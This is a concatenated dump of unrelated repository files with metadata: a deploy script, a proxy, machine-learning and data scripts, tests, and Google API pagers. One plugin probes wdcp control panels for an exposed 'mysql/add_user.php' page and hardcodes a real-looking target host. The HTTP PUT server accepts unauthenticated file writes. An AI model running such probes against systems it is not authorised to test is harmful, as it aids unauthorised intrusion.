    # (or pull if already present), build the image, start the container.
    print env.hosts
    with settings(warn_only=True):
        result = run('docker info')
        if result.failed:
            sudo('yum install -y docker')
            sudo('sudo service docker start')
            sudo('sudo usermod -a -G docker ec2-user')
    # sudo('yum install -y git')
    if not exists('bbc_tool', verbose=True):
        sudo('yum install -y git')
        run('git clone git@bitbucket.org:dschien/bbc_tool.git')
    else:
        update()
    build_container()
    start_nb_server()
def update():
    # Pull the latest revision of the repository on the remote host.
    with cd('bbc_tool'):
        run('git pull')
def start_nb_server(with_assert=False):
    # Start the notebook server container; optionally first make sure the
    # EC2 instance exists and is running.
    if with_assert:
        print('checking instance')
        instance = assert_instance()
        execute(_run_container, hosts=[instance.public_dns_name])
    else:
        execute(_run_container)
def _run_container():
    # Pull the latest code, then launch the notebook container on port
    # 8888, protected with the configured password.
    update()
    cmd = 'docker run -d -p 8888:8888 --name nb-server -v $(pwd):/home/jovyan/work -e PASSWORD="%s" dschien/nb' % \
          env.nb_password
    with cd('bbc_tool'):
        run(cmd)
def build_container(with_assert=False):
    # Build the notebook-server docker image from the repo's Dockerfile.
    print('checking instance')
    if with_assert:
        assert_instance()
    with cd('bbc_tool/docker'):
        run('docker build -t dschien/nb .')
def inspect_container(container_name_or_id=''):
    """ e.g. fab --host ep.iodicus.net inspect_container:container_name_or_id=... """
    # Query docker for the container's running state and map it onto the
    # module-level container_state codes.
    with settings(warn_only=True):
        result = run("docker inspect --format '{{ .State.Running }}' " + container_name_or_id)
        running = (result == 'true')
        if result.failed:
            logger.warn('inspect_container failed for container {}'.format(container_name_or_id))
            return container_state['NOT_FOUND']
        if not running:
            logger.info('container {} stopped'.format(container_name_or_id))
            return container_state['STOPPED']
        logger.info('container {} running'.format(container_name_or_id))
        return container_state['RUNNING']
def stop_container(container_name_or_id=''):
    # Stop the container; warn_only so a missing container is not fatal.
    with settings(warn_only=True):
        result = run("docker stop " + container_name_or_id)
        if not result.failed:
            logger.info('container {} stopped'.format(container_name_or_id))
def remove_container(container_name_or_id=''):
    # Remove the (stopped) container; docker rm echoes the name on success.
    with settings(warn_only=True):
        result = run("docker rm " + container_name_or_id)
        if result == container_name_or_id:
            logger.info('container {} removed'.format(container_name_or_id))
        else:
            logger.warn('unexpect command result, check log output')
def docker_logs(container_name_or_id=''):
    # Tail (and follow) the last 50 log lines of the container.
    with settings(warn_only=True):
        run('docker logs --tail 50 -f {}'.format(container_name_or_id))
def redeploy_container(container_name_or_id=''):
    """ e.g. fab --host ep.iodicus.net inspect_container:container_name_or_id=... """
    # Stop the container if it is running, remove it, and start a fresh
    # notebook-server container.
    # NOTE(review): regardless of which container was removed, only the
    # notebook server is restarted -- confirm that is intended.
    state = inspect_container(container_name_or_id)
    if state == container_state['RUNNING']:
        stop_container(container_name_or_id)
    remove_container(container_name_or_id)
    start_nb_server()
def update_site():
    """
    Pull from git and restart docker containers
    :return:
    """
    update()
    for container in ['nb-server']:
        redeploy_container(container)
|
[
"dschien@gmail.com"
] |
dschien@gmail.com
|
acd3af53e483f5486883751ff18a9e9a124f4c06
|
038e6e13ad4a81cee5dbbd6ccc322d48330d15d7
|
/AnswerCode/463IslandPerimeter.py
|
b6168c15bf6864a09d4e81b9745085bc8ea3662f
|
[] |
no_license
|
aistoume/Leetcode
|
ad69dae6d9f41a03c883fc2582d0afd6997f83d6
|
d8dc574b611d0e3d42367ccd47a44fd8443b0b27
|
refs/heads/master
| 2021-01-12T14:27:18.245818
| 2018-11-09T00:21:04
| 2018-11-09T00:21:04
| 70,066,007
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 657
|
py
|
### Youbin 2017/06/21
### 463 Island Perimeter
class Solution(object):
    def islandPerimeter(self, grid):
        """Return the perimeter of the island formed by 1-cells in *grid*.

        Every land cell contributes 4 edges; each side shared with a
        neighbouring land cell removes one edge from both cells, so each
        shared side subtracts 2 from the running total.
        """
        height = len(grid)
        width = len(grid[0])
        perimeter = 0
        for r in range(height):
            for c in range(width):
                if grid[r][c] != 1:
                    continue
                perimeter += 4
                # Only look up and left so each shared side is counted once.
                if r > 0 and grid[r - 1][c] == 1:
                    perimeter -= 2
                if c > 0 and grid[r][c - 1] == 1:
                    perimeter -= 2
        return perimeter
# Smoke test: the sample grid from LeetCode 463 has perimeter 16.
s = Solution()
l = [[0,1,0,0],[1,1,1,0],[0,1,0,0],[1,1,0,0]]
r = s.islandPerimeter(l)
# Print-statement form was Python-2-only; the call form works in 2 and 3.
print(r)
|
[
"ais.yb.mo@gmail.com"
] |
ais.yb.mo@gmail.com
|
d69f2d5892bc361a4bb224fe5d218221024326c8
|
3ddc7fb5ac7ac91753a29beced3d2cfb63a2ba8b
|
/src/minij_proxy_asgi_aiohttp.py
|
1c317a05af5abdd396904aa838e8becb2573d4f2
|
[] |
no_license
|
abilian/asgi-sandbox
|
3f978ac9eba139e248af3508b506c87ed6f87fe1
|
49f6c50a94e90045c7c60533f6e564e6b745d8b5
|
refs/heads/main
| 2023-05-31T08:39:57.855151
| 2021-06-29T13:34:33
| 2021-06-29T13:34:33
| 364,506,274
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,003
|
py
|
import asyncio
from typing import Mapping
import aiohttp
import fire
import uvicorn
from aiohttp import ClientSSLError, ClientTimeout, TooManyRedirects
from starlette.requests import Request
from starlette.responses import Response
# Extremely aggressive and hardcoded value
TIMEOUT = 10  # seconds; upper bound for each proxied GET
# Origin allowed by default when the request carries no Origin header.
DEFAULT_ACCESS_URL = "https://mynij.app.officejs.com"
async def application(scope, receive, send):
    """Minimal ASGI app proxying GET requests for the Mynij client.

    Only HTTP scopes are handled; any method other than GET is rejected
    with 405, otherwise the target URL is fetched into the response.
    """
    if scope["type"] != "http":
        return
    request = Request(scope, receive)
    response = Response()
    if request.method != "GET":
        # Starlette's Response exposes ``status_code``; the original set a
        # nonexistent ``status`` attribute, so the 405 was never applied.
        response.status_code = 405
    else:
        async with aiohttp.ClientSession() as client:
            await fetch_content(client, request, response)
    await response(scope, receive, send)
async def fetch_content(
    client: aiohttp.ClientSession, request: Request, response: Response
) -> None:
    """Fetch ``request.query_params['url']`` and copy the result into *response*.

    Network failures are mapped onto Cloudflare-style 5xx status codes.
    """
    url = request.query_params["url"]
    proxy_query_header = make_request_headers(request.headers)
    try:
        proxy_response = await client.get(
            url, headers=proxy_query_header, timeout=TIMEOUT
        )
    except ClientSSLError:
        # Invalid SSL Certificate.  (The original assigned these codes to a
        # dead local ``status``; they must go on the Response itself.)
        response.status_code = 526
    except ConnectionError:
        response.status_code = 523
    except asyncio.TimeoutError:
        # aiohttp signals a timeout with asyncio.TimeoutError;
        # aiohttp.ClientTimeout is a configuration object, not an exception.
        response.status_code = 524
    except TooManyRedirects:
        response.status_code = 520
    else:
        # NOTE(review): Content-Length was computed when Response() was
        # constructed -- confirm starlette refreshes it for the new body.
        response.body = await proxy_response.content.read()
        if proxy_response.status == 500:
            response.status_code = 520
        else:
            copy_proxy_headers(proxy_response, response)
    response.headers["Access-Control-Allow-Origin"] = get_access_url(request.headers)
def make_request_headers(headers: Mapping):
    """Build the header dict forwarded upstream, keeping a fixed whitelist.

    Headers that are absent or falsy are dropped; kept values are
    stringified.
    """
    FORWARDED = (
        "Content-Type",
        "Accept",
        "Accept-Language",
        "Range",
        "If-Modified-Since",
        "If-None-Match",
    )
    candidates = ((name, headers.get(name)) for name in FORWARDED)
    return {name: str(value) for name, value in candidates if value}
def get_access_url(headers: Mapping):
    """Return the request's Origin header, or the default access URL."""
    origin = headers.get("Origin")
    return origin if origin is not None else DEFAULT_ACCESS_URL
def copy_proxy_headers(proxy_response, response) -> None:
    """Copy whitelisted headers from the upstream response onto *response*.

    Upstream names are title-cased before matching, so comparison is
    effectively case-insensitive.
    """
    ALLOWED = {
        "Content-Disposition",
        "Content-Type",
        "Date",
        "Last-Modified",
        "Vary",
        "Cache-Control",
        "Etag",
        "Accept-Ranges",
        "Content-Range",
    }
    for raw_name, value in proxy_response.headers.items():
        name = raw_name.title()
        if name in ALLOWED:
            response.headers[name] = value
def main(host="localhost", port=8000, server="uvicorn"):
    # Entry point (exposed via python-fire): serve the ASGI application
    # with uvicorn (default) or hypercorn.
    if server == "uvicorn":
        uvicorn.run(
            "minij_proxy_asgi_aiohttp:application",
            host=host,
            port=port,
            log_level="info",
        )
    elif server == "hypercorn":
        # Imported lazily so hypercorn is only required when selected.
        from hypercorn.asyncio import serve
        from hypercorn.config import Config
        config = Config()
        config.bind = [f"{host}:{port}"]
        asyncio.run(serve(application, config))
    # NOTE(review): any other value of ``server`` silently does nothing.
if __name__ == "__main__":
    fire.Fire(main)
|
[
"sf@fermigier.com"
] |
sf@fermigier.com
|
c239fa23fae2712d15c071e023a056a4116c2caf
|
b4cc610bbd069c2b3e1f50c82303d48de21843a4
|
/ce/c235_test.py
|
896a898bca43a1811bb53b5b1aac0718705bf3b4
|
[] |
no_license
|
AakashKumarNain/pythonesque
|
d47b890ff42fa7baa3f25f9569d8a7310c7aa710
|
3225aaf878c52962becafd60a50243a91f92b264
|
refs/heads/master
| 2020-03-18T00:07:00.624695
| 2018-05-19T09:24:16
| 2018-05-19T09:24:16
| 134,078,646
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 582
|
py
|
"""
Simple or trump
author: Manny egalli64@gmail.com
info: http://thisthread.blogspot.com/2017/01/codeeval-simple-or-trump.html
https://www.codeeval.com/open_challenges/235/
"""
import unittest
from ce.c235 import solution
class TestCodeEval(unittest.TestCase):
    # Regression tests for the CodeEval #235 "Simple or trump" solver,
    # using the challenge's provided samples ("<card> <card> | <trump suit>").
    def test_provided_1(self):
        self.assertEqual('2H', solution('AD 2H | H'))
    def test_provided_2(self):
        # A tie: both cards are returned.
        self.assertEqual('KD KH', solution('KD KH | C'))
    def test_provided_3(self):
        self.assertEqual('JH', solution('JH 10S | C'))
if __name__ == '__main__':
    unittest.main()
|
[
"egalli64@gmail.com"
] |
egalli64@gmail.com
|
8609337d0074cd189a54453539b0385f45cc2b9b
|
ed719ee21d88b1d3fa03fbcc41cb2683930ea665
|
/month05/AI/day05/demo05_traffic.py
|
a52e182e55428309879deb30567c217b8cf38444
|
[] |
no_license
|
KarlLichterVonRandoll/learning_python
|
453305c0af116014e384e4335d53b9775587483d
|
c458e203e7f7bfce9641408ef63d6ba041ed7fef
|
refs/heads/master
| 2022-02-23T03:04:24.580457
| 2019-09-17T03:43:45
| 2019-09-17T03:43:45
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,663
|
py
|
"""
案例:车流量预测 回归问题
"""
import numpy as np
import sklearn.preprocessing as sp
import sklearn.model_selection as ms
import sklearn.svm as svm
import sklearn.metrics as sm
class DigitEncoder():
    # Drop-in stand-in for sklearn's LabelEncoder, used when a column is
    # already numeric: "encoding" is simply a cast to 32-bit integers.
    def fit_transform(self, y):
        """Cast the digit strings in *y* to int32 (fitting is a no-op)."""
        return y.astype('i4')
    def transform(self, y):
        """Cast *y* to int32, mirroring fit_transform."""
        return y.astype('i4')
    def inverse_transform(self, y):
        """Map encoded integers back to their string representation."""
        return y.astype('str')
# Load the raw traffic data as strings; transpose so each row is a column
# of the original file.
data = np.loadtxt(
    '../ml_data/traffic.txt', delimiter=',',
    dtype='U20')
data = data.T
# Build feature matrix x and target vector y, remembering the encoder used
# for each column so new samples can be transformed the same way later.
x, y, encoders = [], [], []
for row in range(len(data)):
    # Pick an encoder for this column: numeric columns are just cast,
    # text columns get a sklearn LabelEncoder.
    if data[row][0].isdigit():
        encoder = DigitEncoder()
    else:
        encoder = sp.LabelEncoder()
    # The last row is the target; all earlier rows are features.
    if row < len(data) - 1:
        x.append(encoder.fit_transform(data[row]))
    else:
        y = encoder.fit_transform(data[row])
    encoders.append(encoder)
x = np.array(x).T
y = np.array(y)
print(x.shape, y.shape, x[0], y[0])
# Hold out 25% of the samples for evaluation.
train_x, test_x, train_y, test_y = \
    ms.train_test_split(
        x, y, test_size=0.25, random_state=7)
# Support-vector regression with an RBF kernel.
model = svm.SVR(
    kernel='rbf', C=10, epsilon=0.2)
model.fit(train_x, train_y)
pred_test_y = model.predict(test_x)
# Report r2_score and mean absolute error on the held-out set.
print(sm.r2_score(test_y, pred_test_y))
print(sm.mean_absolute_error(test_y, pred_test_y))
# Predict the traffic volume for one new sample, reusing the per-column
# encoders fitted above.
data = [['Tuesday', '13:35', 'San Francisco', 'no']]
data = np.array(data).T
x = []
for row in range(len(data)):
    encoder = encoders[row]
    x.append(encoder.transform(data[row]))
x = np.array(x).T
pred_y = model.predict(x)
print(pred_y)
|
[
"286631670@qq.com"
] |
286631670@qq.com
|
4785a18fd7f8139ca9ffe991135f4fb33afce469
|
97f285b6f8016a8d1d2d675fffb771df3c9e37b9
|
/web/simplehttpputserver.py
|
29a977339705467a06f309e41d64dc6f919fd323
|
[] |
no_license
|
oskomorokhov/python
|
ef5408499840465d18852954aee9de460d0e7250
|
8909396c4200bd2fca19d3f216ed5f484fb2192a
|
refs/heads/master
| 2021-05-14T09:27:25.413163
| 2019-12-12T21:00:05
| 2019-12-12T21:00:05
| 116,327,306
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 446
|
py
|
import SimpleHTTPServer
import BaseHTTPServer
class SputHTTPRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
    # SimpleHTTPRequestHandler (Python 2) extended with HTTP PUT support:
    # the request body is written to the file mapped from the URL path.
    def do_PUT(self):
        print self.headers
        length = int(self.headers["Content-Length"])
        # translate_path maps the URL path onto the served directory tree.
        path = self.translate_path(self.path)
        # NOTE(review): any client can overwrite files under the served
        # directory -- no authentication, and no response status is sent
        # back.  Confirm this is only ever run on trusted networks.
        with open(path, "wb") as dst:
            dst.write(self.rfile.read(length))
if __name__ == '__main__':
    SimpleHTTPServer.test(HandlerClass=SputHTTPRequestHandler)
|
[
"oskom85@gmail.com"
] |
oskom85@gmail.com
|
3944f19dacca45a6c4ca733edff9d19acdd24250
|
4a8bfa3407aa98a04ede3162f85467b1b5012fe7
|
/tests/test_api/test_methods/test_edit_message_live_location.py
|
07b61a9d518c71e42d0b70073e468713690f8296
|
[] |
no_license
|
aiogram/tg-codegen
|
07ec80814eec46f464d2490fd27b7b6b27257f1b
|
ba3c2f893591d45dda418dd16e0646e260afdf14
|
refs/heads/master
| 2022-12-09T10:44:10.781570
| 2021-11-07T23:33:25
| 2021-11-07T23:33:25
| 218,523,371
| 24
| 5
| null | 2022-12-08T08:47:43
| 2019-10-30T12:33:21
|
Python
|
UTF-8
|
Python
| false
| false
| 1,141
|
py
|
import pytest
from aiogram.api.methods import EditMessageLiveLocation, Request
from tests.mocked_bot import MockedBot
@pytest.mark.skip
class TestEditMessageLiveLocation:
    # Skipped scaffold for the Bot API ``editMessageLiveLocation`` method.
    # NOTE(review): ``Union`` and ``Message`` are not imported in this
    # module, so un-skipping these tests would raise NameError on the
    # annotated assignments -- add the imports before enabling them.
    @pytest.mark.asyncio
    async def test_method(self, bot: MockedBot):
        # Register a canned result, await the method object directly, then
        # inspect the request the mocked bot captured.
        prepare_result = bot.add_result_for(EditMessageLiveLocation, ok=True, result=None)
        response: Union[Message, bool] = await EditMessageLiveLocation(
            latitude=..., longitude=...,
        )
        request: Request = bot.get_request()
        assert request.method == "editMessageLiveLocation"
        # assert request.data == {}
        assert response == prepare_result.result
    @pytest.mark.asyncio
    async def test_bot_method(self, bot: MockedBot):
        # Same scenario, but through the high-level Bot helper method.
        prepare_result = bot.add_result_for(EditMessageLiveLocation, ok=True, result=None)
        response: Union[Message, bool] = await bot.edit_message_live_location(
            latitude=..., longitude=...,
        )
        request: Request = bot.get_request()
        assert request.method == "editMessageLiveLocation"
        # assert request.data == {}
        assert response == prepare_result.result
|
[
"jroot.junior@gmail.com"
] |
jroot.junior@gmail.com
|
1ee61b83ccfaad20826b03e78474d2cbc307c42e
|
320bf3ddd6233577d9f2f08f046eaef96f881e4e
|
/Pillow-4.3.0/Tests/test_image_fromqpixmap.py
|
543b74bbf249991a39c73878b670772b46f1f152
|
[
"MIT"
] |
permissive
|
leorzz/simplemooc
|
057ba3e220c20907017edfd8d0fc0422f9a6d99c
|
8b1c5e939d534b1fd729596df4c59fc69708b896
|
refs/heads/master
| 2022-10-22T02:24:46.733062
| 2017-12-17T16:37:04
| 2017-12-17T16:37:04
| 112,488,280
| 0
| 1
|
MIT
| 2022-10-08T17:50:17
| 2017-11-29T14:52:23
|
Python
|
UTF-8
|
Python
| false
| false
| 837
|
py
|
from helper import unittest, PillowTestCase, hopper
from test_imageqt import PillowQtTestCase, PillowQPixmapTestCase
from PIL import ImageQt
class TestFromQPixmap(PillowQPixmapTestCase, PillowTestCase):
    # Round-trips the hopper test image through Qt QPixmap conversion in
    # every common PIL mode.
    def roundtrip(self, expected):
        # Convert PIL -> QPixmap -> PIL and compare against the original.
        PillowQtTestCase.setUp(self)
        result = ImageQt.fromqpixmap(ImageQt.toqpixmap(expected))
        # Qt saves all pixmaps as rgb
        self.assert_image_equal(result, expected.convert('RGB'))
    def test_sanity_1(self):
        # 1-bit bilevel image.
        self.roundtrip(hopper('1'))
    def test_sanity_rgb(self):
        self.roundtrip(hopper('RGB'))
    def test_sanity_rgba(self):
        self.roundtrip(hopper('RGBA'))
    def test_sanity_l(self):
        # 8-bit greyscale.
        self.roundtrip(hopper('L'))
    def test_sanity_p(self):
        # Palette-mapped image.
        self.roundtrip(hopper('P'))
if __name__ == '__main__':
    unittest.main()
|
[
"rizzi.leo@gmail.com"
] |
rizzi.leo@gmail.com
|
2355d881f34c0c2f4732ca8e036b6929a66a23ef
|
914aa18d6420b9b920e2a20df238302f891f79f1
|
/arda_db/browser/migrations/0026_auto_20150422_1032.py
|
a135283cb1fba4231de8554d44cf9258057ef8a9
|
[
"MIT"
] |
permissive
|
rwspicer/ARDA
|
2152405c911afacad14dd1478b040f5af9246ba2
|
9bd98786feff4afbd45afdf3f3f1c2549f6356cf
|
refs/heads/master
| 2016-08-05T10:08:13.719344
| 2015-05-01T00:56:27
| 2015-05-01T00:56:27
| 30,052,617
| 5
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 885
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    # Auto-generated migration: gives the borrower contact fields of the
    # ``rlibrary`` model empty-string defaults (and fixed max_lengths).
    # Left byte-for-byte as generated -- applied migrations must not change.
    dependencies = [
        ('browser', '0025_auto_20150422_0958'),
    ]
    operations = [
        migrations.AlterField(
            model_name='rlibrary',
            name='borrower_name',
            field=models.CharField(default=b'', max_length=60, verbose_name=b'name'),
            preserve_default=True,
        ),
        migrations.AlterField(
            model_name='rlibrary',
            name='email',
            field=models.CharField(default=b'', max_length=50),
            preserve_default=True,
        ),
        migrations.AlterField(
            model_name='rlibrary',
            name='phone',
            field=models.CharField(default=b'', max_length=10),
            preserve_default=True,
        ),
    ]
|
[
"rwspicer@alaska.edu"
] |
rwspicer@alaska.edu
|
fdaa9958c1db7acfca7016877bdfcc4a501fae5c
|
2f564cb0b358d00387287fb62fec78b51c806771
|
/Tag11/dozent_projekt2_2.py
|
f8b6b362388a3e800fc5c05878e3b3e4da29872b
|
[] |
no_license
|
anna-s-dotcom/python_alles
|
b736422f842995fc8731378ffa79ae4a9ffbe543
|
a36c8aea20444b98e5676ea6cf73824453e76c85
|
refs/heads/master
| 2020-12-30T06:01:26.684038
| 2020-02-07T09:34:28
| 2020-02-07T09:34:28
| 238,884,852
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,461
|
py
|
import pandas as pd
# Open the 2014 results once just to discover the file's text encoding.
with open('EU2014_BE_EndgErg_Wahlbezirke.csv') as file:
    print(file)
    codec = file.encoding
# Columns of interest; the 2019 file names districts 'Adresse' instead of
# 'WbezirksName'.
cols14 = ['WbezirksName', 'CDU', 'SPD', 'GRÜNE']
cols19 = ['Adresse', 'CDU', 'SPD', 'GRÜNE']
df2014 = pd.read_csv('EU2014_BE_EndgErg_Wahlbezirke.csv',
                     encoding = codec,
                     delimiter = ';')[cols14].dropna(thresh = 4)
df2019 = pd.read_csv('EU2019_BE_EndgErg_Wahlbezirke.csv',
                     encoding = codec,
                     delimiter = ';')[cols19].dropna(thresh = 4)
# print(df2014)
# print()
# print(df2019)
# Inner-join the two elections on the district name, keeping only
# districts present in both years.
dfm = pd.merge(df2014, df2019,
               left_on = 'WbezirksName',
               right_on = 'Adresse',
               suffixes = ('-2014', '-2019'),
               how = 'inner').drop('WbezirksName', axis = 1)
# print()
# print(dfm)
# 1: per-district vote change for each party between the two elections.
dfm['diff-CDU'] = dfm['CDU-2019'] - dfm['CDU-2014']
dfm['diff-SPD'] = dfm['SPD-2019'] - dfm['SPD-2014']
dfm['diff-GRÜNE'] = dfm['GRÜNE-2019'] - dfm['GRÜNE-2014']
print(dfm)
# 2: total vote change across the three parties (NaN-safe sums).
import numpy as np
cdu = np.nansum(dfm['diff-CDU'])
spd = np.nansum(dfm['diff-SPD'])
gruene = np.nansum(dfm['diff-GRÜNE'])
ges = cdu + spd + gruene
print('Gesamtdifferenz 2019 - 2014:', ges)
# 3: per-year grand totals (computed here but never printed).
ges2014 = np.nansum(dfm['CDU-2014']) + np.nansum(dfm['SPD-2014']) + np.nansum(dfm['GRÜNE-2014'])
ges2019 = np.nansum(dfm['CDU-2019']) + np.nansum(dfm['SPD-2019']) + np.nansum(dfm['GRÜNE-2019'])
|
[
"noreply@github.com"
] |
anna-s-dotcom.noreply@github.com
|
874fa3ca559f2c40ad8cc644dff21b7b95f8e113
|
0f3a0be642cd6a2dd792c548cf7212176761e9b1
|
/zoo_services/r_quant.py
|
921ca91d0ab3e32f1f20b9964aab0268989f5f96
|
[] |
no_license
|
huhabla/wps-grass-bridge
|
63a5d60735d372e295ec6adabe527eec9e72635a
|
aefdf1516a7517b1b745ec72e2d2481a78e10017
|
refs/heads/master
| 2021-01-10T10:10:34.246497
| 2014-01-22T23:40:58
| 2014-01-22T23:40:58
| 53,005,463
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 335
|
py
|
#####################################################
# This service was generated using wps-grass-bridge #
#####################################################
import ZOOGrassModuleStarter as zoo
def r_quant(m, inputs, outputs):
    # ZOO-WPS entry point wrapping the GRASS module ``r.quant``: delegates
    # execution to the generated module starter.
    # NOTE(review): the constant 3 is presumably the ZOO SERVICE_SUCCEEDED
    # status code -- confirm against the zoo kernel constants.
    service = zoo.ZOOGrassModuleStarter()
    service.fromMaps("r.quant", inputs, outputs)
    return 3
|
[
"soerengebbert@23da3d23-e2f9-862c-be8f-f61c6c06f202"
] |
soerengebbert@23da3d23-e2f9-862c-be8f-f61c6c06f202
|
ae5947b28dec115479830ae29afd18ebc32c7e22
|
f47863b3a595cbe7ec1c02040e7214481e4f078a
|
/plugins/scan/wdcp/167.py
|
bd1da6017ce37455e7700763703fafe9d4907334
|
[] |
no_license
|
gobiggo/0bscan
|
fe020b8f6f325292bda2b1fec25e3c49a431f373
|
281cf7c5c2181907e6863adde27bd3977b4a3474
|
refs/heads/master
| 2020-04-10T20:33:55.008835
| 2018-11-17T10:05:41
| 2018-11-17T10:05:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 454
|
py
|
#Referer: http://www.securityfocus.com/archive/1/534437
def assign(service, arg):
    """Accept the scan task only for the ``wdcp`` service.

    Returns ``(True, arg)`` when the service matches, ``None`` otherwise
    (the implicit contract the scanner framework expects).
    """
    if service != "wdcp":
        return None
    return True, arg
def audit(args):
    # Probe the wdcp MySQL management page: a 200 response containing
    # 'localhost' indicates the unauthenticated add_user page is exposed.
    # NOTE(review): ``curl`` and ``security_hole`` are injected by the
    # surrounding scanner framework, not defined in this module.
    payload = 'mysql/add_user.php'
    verify_url = args + payload
    code, head, content, errcode,finalurl = curl.curl(verify_url)
    if code==200 and 'localhost' in content:
        security_hole(verify_url)
if __name__ == '__main__':
    audit(assign('wdcp', 'http://wxw80.tem.com.cn:5368/')[1])
|
[
"zer0i3@aliyun.com"
] |
zer0i3@aliyun.com
|
18b9a0b08fc6f3640ffb5be316121465654299dd
|
13f4a06cd439f579e34bf38406a9d5647fe7a0f3
|
/script/try_python/try_Django/helloworld/pages/urls.py
|
59a86d03a775a770128e079590cbc606291121cb
|
[] |
no_license
|
edt-yxz-zzd/python3_src
|
43d6c2a8ef2a618f750b59e207a2806132076526
|
41f3a506feffb5f33d4559e5b69717d9bb6303c9
|
refs/heads/master
| 2023-05-12T01:46:28.198286
| 2023-05-01T13:46:32
| 2023-05-01T13:46:32
| 143,530,977
| 2
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 202
|
py
|
# pages/urls.py
from django.urls import path
from . import views
urlpatterns = [
    # path() matches the literal (non-regex) route '' -- the site root --
    # and registers it under the name 'home' for reverse() lookups.
    path('', views.homePageView, name='home')
]
|
[
"wuming_zher@zoho.com.cn"
] |
wuming_zher@zoho.com.cn
|
3183c146bc2bb4c8964991dcdcb8026a509b1d5e
|
eb9c3dac0dca0ecd184df14b1fda62e61cc8c7d7
|
/google/cloud/gaming/v1beta/gaming-v1beta-py/google/cloud/gaming_v1beta/services/game_server_configs_service/pagers.py
|
dc651ab737e7b1b69464cf324e8b0d27964ac8c3
|
[
"Apache-2.0"
] |
permissive
|
Tryweirder/googleapis-gen
|
2e5daf46574c3af3d448f1177eaebe809100c346
|
45d8e9377379f9d1d4e166e80415a8c1737f284d
|
refs/heads/master
| 2023-04-05T06:30:04.726589
| 2021-04-13T23:35:20
| 2021-04-13T23:35:20
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,131
|
py
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from typing import Any, AsyncIterable, Awaitable, Callable, Iterable, Sequence, Tuple, Optional
from google.cloud.gaming_v1beta.types import game_server_configs
class ListGameServerConfigsPager:
    """A pager for iterating through ``list_game_server_configs`` requests.

    This class thinly wraps an initial
    :class:`google.cloud.gaming_v1beta.types.ListGameServerConfigsResponse` object, and
    provides an ``__iter__`` method to iterate through its
    ``game_server_configs`` field.

    If there are more pages, the ``__iter__`` method will make additional
    ``ListGameServerConfigs`` requests and continue to iterate
    through the ``game_server_configs`` field on the
    corresponding responses.

    All the usual :class:`google.cloud.gaming_v1beta.types.ListGameServerConfigsResponse`
    attributes are available on the pager. If multiple requests are made, only
    the most recent response is retained, and thus used for attribute lookup.
    """
    def __init__(self,
            method: Callable[..., game_server_configs.ListGameServerConfigsResponse],
            request: game_server_configs.ListGameServerConfigsRequest,
            response: game_server_configs.ListGameServerConfigsResponse,
            *,
            metadata: Sequence[Tuple[str, str]] = ()):
        """Instantiate the pager.

        Args:
            method (Callable): The method that was originally called, and
                which instantiated this pager.
            request (google.cloud.gaming_v1beta.types.ListGameServerConfigsRequest):
                The initial request object.
            response (google.cloud.gaming_v1beta.types.ListGameServerConfigsResponse):
                The initial response object.
            metadata (Sequence[Tuple[str, str]]): Strings which should be
                sent along with the request as metadata.
        """
        self._method = method
        # Re-wrap the request so page_token can be advanced independently
        # of the caller's object.
        self._request = game_server_configs.ListGameServerConfigsRequest(request)
        self._response = response
        self._metadata = metadata
    def __getattr__(self, name: str) -> Any:
        # Delegate unknown attribute lookups to the most recent response.
        return getattr(self._response, name)
    @property
    def pages(self) -> Iterable[game_server_configs.ListGameServerConfigsResponse]:
        # Yield the current page, then fetch further pages until the
        # service stops returning a next_page_token.
        yield self._response
        while self._response.next_page_token:
            self._request.page_token = self._response.next_page_token
            self._response = self._method(self._request, metadata=self._metadata)
            yield self._response
    def __iter__(self) -> Iterable[game_server_configs.GameServerConfig]:
        # Flatten the pages into a stream of GameServerConfig items.
        for page in self.pages:
            yield from page.game_server_configs
    def __repr__(self) -> str:
        return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
class ListGameServerConfigsAsyncPager:
    """A pager for iterating through ``list_game_server_configs`` requests.

    This class thinly wraps an initial
    :class:`google.cloud.gaming_v1beta.types.ListGameServerConfigsResponse` object, and
    provides an ``__aiter__`` method to iterate through its
    ``game_server_configs`` field.

    If there are more pages, the ``__aiter__`` method will make additional
    ``ListGameServerConfigs`` requests and continue to iterate
    through the ``game_server_configs`` field on the
    corresponding responses.

    All the usual :class:`google.cloud.gaming_v1beta.types.ListGameServerConfigsResponse`
    attributes are available on the pager. If multiple requests are made, only
    the most recent response is retained, and thus used for attribute lookup.
    """
    def __init__(self,
            method: Callable[..., Awaitable[game_server_configs.ListGameServerConfigsResponse]],
            request: game_server_configs.ListGameServerConfigsRequest,
            response: game_server_configs.ListGameServerConfigsResponse,
            *,
            metadata: Sequence[Tuple[str, str]] = ()):
        """Instantiate the pager.

        Args:
            method (Callable): The method that was originally called, and
                which instantiated this pager.
            request (google.cloud.gaming_v1beta.types.ListGameServerConfigsRequest):
                The initial request object.
            response (google.cloud.gaming_v1beta.types.ListGameServerConfigsResponse):
                The initial response object.
            metadata (Sequence[Tuple[str, str]]): Strings which should be
                sent along with the request as metadata.
        """
        self._method = method
        # Re-wrap the request so page_token can be advanced independently
        # of the caller's object.
        self._request = game_server_configs.ListGameServerConfigsRequest(request)
        self._response = response
        self._metadata = metadata
    def __getattr__(self, name: str) -> Any:
